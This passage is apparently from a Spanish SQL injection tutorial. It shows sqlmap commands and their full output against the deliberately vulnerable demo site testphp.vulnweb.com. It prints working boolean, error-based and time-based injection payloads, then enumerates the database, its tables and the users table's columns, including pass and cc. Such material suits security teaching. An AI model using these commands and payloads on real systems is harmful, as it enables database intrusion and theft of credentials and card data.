ble (possible DBMS: MySQL) [10:52:51] [INFO] testing sql injection on GET parameter 'cat' [10:52:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAV ING clause' injectable [10:52:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE o r HAVING clause' injectable [10:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:52:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' i njectable [10:53:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requ ests: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[10:54:07] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake )

web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0
[10:54:07] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\testphp.vulnweb.com' [*] shutting down at: 10:54:07

El parmetro cat es vulnerable

Ivn Martn Valderas

Pgina 24

SQL Injection

B) Nombre de la BD
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?ca t=1 --current-db
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:52:15 [11:52:15] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:52:15] [INFO] resuming injection data from session file [11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:52:15] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:52:16] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:52:16] [INFO] fetching current database

[11:52:18] [INFO] retrieved: acuart current database: 'acuart'

[11:52:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\testphp.vulnweb.com' [*] shutting down at: 11:52:18

C) Tablas
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?ca t=1 --tables -D acuart
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:54:12 [11:54:12] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:54:12] [INFO] resuming injection data from session file [11:54:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:54:12] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:54:14] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:54:14] [INFO] fetching tables for database 'acuart' [11:54:14] [INFO] the SQL query used returns 7 entries [11:54:15] [INFO] retrieved: acuart [11:54:15] [INFO] retrieved: artists [11:54:15] [INFO] retrieved: acuart [11:54:15] [INFO] retrieved: carts [11:54:16] [INFO] retrieved: acuart [11:54:16] [INFO] retrieved: categ [11:54:16] [INFO] retrieved: acuart [11:54:16] [INFO] retrieved: featured [11:54:17] [INFO] retrieved: acuart [11:54:17] [INFO] retrieved: guestbook [11:54:17] [INFO] retrieved: acuart [11:54:17] [INFO] retrieved: pictures [11:54:18] [INFO] retrieved: acuart [11:54:18] [INFO] retrieved: users

Database: acuart [7 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | users | +-----------+

Ivn Martn Valderas

Pgina 26

SQL Injection

D) Columnas
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?ca t=1 --columns -T users -D acuart
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:56:55 [11:56:55] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:56:55] [INFO] resuming injection data from session file [11:56:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:56:55] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:56:56] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:56:56] [INFO] fetching columns for table 'users' on database 'acuart' [11:56:56] [INFO] the SQL query used returns 8 entries [11:56:56] [INFO] retrieved: uname [11:56:56] [INFO] retrieved: varchar(100) [11:56:57] [INFO] retrieved: pass [11:56:57] [INFO] retrieved: varchar(100) [11:56:57] [INFO] retrieved: cc Database: acuart [11:56:58] [INFO] retrieved: varchar(100) [11:56:58] [INFO] retrieved: address Table: users [11:56:58] [INFO] retrieved: mediumtext [8 columns] [11:56:58] [INFO] retrieved: email +---------+--------------+ [11:56:58] [INFO] retrieved: varchar(100) | Column | Type | [11:56:58] [INFO] retrieved: name [11:56:59] [INFO] retrieved: varchar(100) +---------+--------------+ [11:56:59] [INFO] retrieved: phone | address | mediumtext [11:56:59] [INFO] retrieved: varchar(100) | cart | varchar(100) | [11:56:59] [INFO] retrieved: cart | cc | varchar(100) | [11:56:59] [INFO] retrieved: varchar(100)

| email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(100) | | uname | varchar(100) | +---------+--------------+